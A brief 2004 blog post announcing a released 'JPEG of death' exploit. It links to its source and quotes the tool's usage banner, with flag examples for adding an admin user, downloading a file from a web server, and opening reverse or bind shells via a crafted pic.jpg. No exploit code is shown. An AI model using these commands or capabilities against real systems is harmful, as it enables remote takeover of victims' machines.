Monday, September 27, 2004

JPEG of death - all in one exploit released

Source code here on k-otik

Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload
Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a Specific Port;
* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)